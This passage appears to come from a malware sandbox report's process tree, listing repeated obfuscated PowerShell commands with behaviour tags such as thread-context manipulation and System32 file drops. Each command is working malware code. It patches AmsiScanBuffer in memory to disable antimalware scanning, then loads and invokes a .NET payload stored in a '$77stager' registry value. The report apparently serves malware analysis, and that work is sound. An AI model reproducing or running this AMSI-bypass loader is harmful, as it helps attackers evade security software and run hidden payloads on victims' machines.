'+[Char](79)+''+[Char](70)+''+'T'+'WAR'+[Char](69)+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ijVPkjosyeMM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wWDQwzhmjrnmCx,[Parameter(Position=1)][Type]$IuJnckrBMj)$ooaLZKrqzWv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+'m'+'or'+[Char](121)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+''+'e'+'l'+'e'+'g'+'a'+'t'+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'','Cl'+[Char](97)+'s'+[Char](115)+','+'P'+''+'u'+'b'+'l'+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+'ale'+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ooaLZKrqzWv.DefineConstructor(''+'R'+'T'+[Char](83)+'pe'+'c'+''+[Char](105)+''+'a'+'lNa'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+'BySi'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'lic',[Reflection.CallingConventions]::Standard,$wWDQwzhmjrnmCx).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');$ooaLZKrqzWv.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$IuJnckrBMj,$wWDQwzhmjrnmCx).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+'g'+'e'+[Char](100)+'');Write-Output $ooaLZKrqzWv.CreateType();}$WalFdQGeMMRZP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+'t'+''+'e'+''+[Char](109)+''+'.'+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+'f'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+'Me'+[Char](116)+''+'h'+''+[Char](111)+'ds');$ahwPFbFBOwuHfX=$WalFdQGeMMRZP.GetMethod('Ge'+[Char](116)+''+[Char](80)+'ro'+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+'l'+'ic'+[Char](44)+'St'+[Char](97)+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YJVsKdvXLnXvaBRqBOF=ijVPkjosyeMM @([String])([IntPtr]);$DJAggiESLjfxaTQVjttIBV=ijVPkjosyeMM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZbYXtPLOgmh=$WalFdQGeMMRZP.GetMethod(''+'G'+''+[Char](101)+''+'t'+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+'3'+'2'+[Char](46)+'d'+[Char](108)+''+'l'+'')));$IxZGucTJiirrmq=$ahwPFbFBOwuHfX.Invoke($Null,@([Object]$ZbYXtPLOgmh,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$ALvVhmrxDXDRkQUxw=$ahwPFbFBOwuHfX.Invoke($Null,@([Object]$ZbYXtPLOgmh,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+'t'+''+'e'+''+[Char](99)+'t')));$fckeURT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IxZGucTJiirrmq,$YJVsKdvXLnXvaBRqBOF).Invoke(''+[Char](97)+'m'+[Char](115)+'i'+'.'+''+'d'+''+'l'+''+[Char](108)+'');$gvsTtdgYbXAtFzIJi=$ahwPFbFBOwuHfX.Invoke($Null,@([Object]$fckeURT,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+'B'+[Char](117)+'ff'+[Char](101)+'r')));$qLHwHSELQl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ALvVhmrxDXDRkQUxw,$DJAggiESLjfxaTQVjttIBV).Invoke($gvsTtdgYbXAtFzIJi,[uint32]8,4,[ref]$qLHwHSELQl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$gvsTtdgYbXAtFzIJi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ALvVhmrxDXDRkQUxw,$DJAggiESLjfxaTQVjttIBV).Invoke($gvsTtdgYbXAtFzIJi,[uint32]8,0x20,[ref]$qLHwHSELQl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:arjlPtoyoiRt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EEtZjjDcdxBfKW,[Parameter(Position=1)][Type]$DpuPaRfDOf)$IukIyflcNib=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'ga'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+'r'+'y'+''+'M'+''+[Char](111)+'d'+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+'y'+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+'A'+'n'+'s'+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+',A'+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$IukIyflcNib.DefineConstructor(''+[Char](82)+''+'T'+'Spe'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+'a'+'m'+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+'e'+'B'+'yS'+'i'+''+'g'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$EEtZjjDcdxBfKW).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$IukIyflcNib.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+'c'+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'al',$DpuPaRfDOf,$EEtZjjDcdxBfKW).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $IukIyflcNib.CreateType();}$pZjxDjtLPyNGj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+'cro'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+'2.'+'U'+''+[Char](110)+''+[Char](115)+''+'a'+''+'f'+'e'+'N'+'a'+'t'+''+[Char](105)+'v'+'e'+''+[Char](77)+'e'+'t'+''+'h'+''+[Char](111)+''+[Char](100)+'s');$AypPVDEMYrRSYl=$pZjxDjtLPyNGj.GetMethod('Ge'+[Char](116)+''+'P'+'roc'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+'es'+'s'+'',[Reflection.BindingFlags]('Publ'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sMUQFfmmOwYkmjKANyl=arjlPtoyoiRt @([String])([IntPtr]);$CTvwOBTpicluXopzmERUmN=arjlPtoyoiRt @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$sOLVUEaIyFi=$pZjxDjtLPyNGj.GetMethod(''+[Char](71)+'et'+'M'+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+'e'+'H'+[Char](97)+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+'e'+''+[Char](108)+'3'+[Char](50)+'.'+'d'+''+[Char](108)+'l')));$uzidXdHrTqYIKZ=$AypPVDEMYrRSYl.Invoke($Null,@([Object]$sOLVUEaIyFi,[Object](''+'L'+''+[Char](111)+''+'a'+'dL'+'i'+'br'+'a'+''+[Char](114)+'yA')));$jwztBNkVXLdObDQYK=$AypPVDEMYrRSYl.Invoke($Null,@([Object]$sOLVUEaIyFi,[Object](''+[Char](86)+'irtual'+[Char](80)+'r'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$onRNTKa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uzidXdHrTqYIKZ,$sMUQFfmmOwYkmjKANyl).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+'dl'+'l'+'');$VuXlBFlecSKubdzWo=$AypPVDEMYrRSYl.Invoke($Null,@([Object]$onRNTKa,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'f'+[Char](101)+''+[Char](114)+'')));$HjoVRpZfdG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jwztBNkVXLdObDQYK,$CTvwOBTpicluXopzmERUmN).Invoke($VuXlBFlecSKubdzWo,[uint32]8,4,[ref]$HjoVRpZfdG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VuXlBFlecSKubdzWo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jwztBNkVXLdObDQYK,$CTvwOBTpicluXopzmERUmN).Invoke($VuXlBFlecSKubdzWo,[uint32]8,0x20,[ref]$HjoVRpZfdG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KmDzNkZblPAm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$chXDGKGRELtKKr,[Parameter(Position=1)][Type]$QmTiWZkaIM)$FoBQPGEmKpd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','Cl'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+''+[Char](44)+'Ans'+[Char](105)+''+'C'+'la'+[Char](115)+''+'s'+''+','+''+[Char](65)+'ut'+[Char](111)+''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$FoBQPGEmKpd.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$chXDGKGRELtKKr).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$FoBQPGEmKpd.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+'ub'+[Char](108)+''+'i'+''+[Char](99)+','+'H'+'i'+[Char](100)+''+[Char](101)+'BySig,'+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+',V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'',$QmTiWZkaIM,$chXDGKGRELtKKr).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+'t'+'i'+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $FoBQPGEmKpd.CreateType();}$jEaojdYqEjHoR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+'s'+[Char](116)+'e'+[Char](109)+'.'+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'roso'+'f'+''+'t'+'.'+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+'U'+'n'+'saf'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+'M'+''+'e'+'th'+[Char](111)+''+'d'+''+[Char](115)+'');$rLlEdhgoFcCcIm=$jEaojdYqEjHoR.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+'r'+'o'+'cA'+'d'+''+'d'+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+'ta'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NhgETfKFiBJsBdyTNYE=KmDzNkZblPAm @([String])([IntPtr]);$zdSBfoGgMKQvyLIDaHlZmU=KmDzNkZblPAm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KozuOfobloU=$jEaojdYqEjHoR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+'.'+''+'d'+'ll')));$OJuWfnDjBxaPhE=$rLlEdhgoFcCcIm.Invoke($Null,@([Object]$KozuOfobloU,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+'i'+[Char](98)+''+'r'+''+'a'+'r'+[Char](121)+''+'A'+'')));$WwbKmjKpulKrIpdsv=$rLlEdhgoFcCcIm.Invoke($Null,@([Object]$KozuOfobloU,[Object](''+'V'+'ir'+'t'+''+'u'+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$YFmdtvV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OJuWfnDjBxaPhE,$NhgETfKFiBJsBdyTNYE).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$JpYiVBLhCOOpJFLQl=$rLlEdhgoFcCcIm.Invoke($Null,@([Object]$YFmdtvV,[Object]('A'+'m'+''+[Char](115)+''+'i'+'S'+[Char](99)+'a'+[Char](110)+'Bu'+'f'+''+[Char](102)+'er')));$caUsADjGDN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WwbKmjKpulKrIpdsv,$zdSBfoGgMKQvyLIDaHlZmU).Invoke($JpYiVBLhCOOpJFLQl,[uint32]8,4,[ref]$caUsADjGDN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JpYiVBLhCOOpJFLQl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WwbKmjKpulKrIpdsv,$zdSBfoGgMKQvyLIDaHlZmU).Invoke($JpYiVBLhCOOpJFLQl,[uint32]8,0x20,[ref]$caUsADjGDN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GqjmWheZLJZm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LTTfcIXHSnjver,[Parameter(Position=1)][Type]$bHPNqyTfRY)$JsoNGpVrlFH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'le'+'c'+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'em'+[Char](111)+'r'+'y'+''+[Char](77)+''+[Char](111)+''+'d'+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','Cl'+[Char](97)+''+[Char](115)+'s,'+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$JsoNGpVrlFH.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+'e'+''+'c'+'i'+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+'H'+[Char](105)+'deBy'+[Char](83)+''+[Char](105)+''+[Char](103)+',P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$LTTfcIXHSnjver).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+',M'+'a'+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JsoNGpVrlFH.DefineMethod(''+[Char](73)+''+[Char](110)+'voke',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'yS'+'i'+'g,'+[Char](78)+''+[Char](101)+''+'w'+'S'+[Char](108)+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+'al',$bHPNqyTfRY,$LTTfcIXHSnjver).SetImplementationFlags('R'+'u'+'n'+'t'+'im'+[Char](101)+''+','+''+'M'+''+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $JsoNGpVrlFH.CreateType();}$iFEhYXiYCPWFu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+'ll')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+'safe'+[Char](78)+'at'+[Char](105)+''+[Char](118)+'eMe'+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$jklAVKgzyJALUM=$iFEhYXiYCPWFu.GetMethod('Ge'+[Char](116)+''+'P'+'r'+'o'+''+[Char](99)+'Ad'+[Char](100)+'r'+'e'+''+'s'+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+','+'S'+'ta'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CxMdNepptQXxyBYJbeJ=GqjmWheZLJZm @([String])([IntPtr]);$JeOxPQfoxlKLqplwwAxNpE=GqjmWheZLJZm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$inPjjVEtMQl=$iFEhYXiYCPWFu.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'M'+''+[Char](111)+'d'+'u'+''+[Char](108)+'e'+'H'+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+'.'+'dl'+[Char](108)+'')));$dHlMYefSiWETjU=$jklAVKgzyJALUM.Invoke($Null,@([Object]$inPjjVEtMQl,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+'A')));$mGnmRgtglPWYmnLAy=$jklAVKgzyJALUM.Invoke($Null,@([Object]$inPjjVEtMQl,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$iekUSdA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dHlMYefSiWETjU,$CxMdNepptQXxyBYJbeJ).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$ruEOnIsyoPXSqUyEh=$jklAVKgzyJALUM.Invoke($Null,@([Object]$iekUSdA,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+'c'+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$aqDsSyqvlm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mGnmRgtglPWYmnLAy,$JeOxPQfoxlKLqplwwAxNpE).Invoke($ruEOnIsyoPXSqUyEh,[uint32]8,4,[ref]$aqDsSyqvlm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ruEOnIsyoPXSqUyEh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mGnmRgtglPWYmnLAy,$JeOxPQfoxlKLqplwwAxNpE).Invoke($ruEOnIsyoPXSqUyEh,[uint32]8,0x20,[ref]$aqDsSyqvlm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'ARE').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
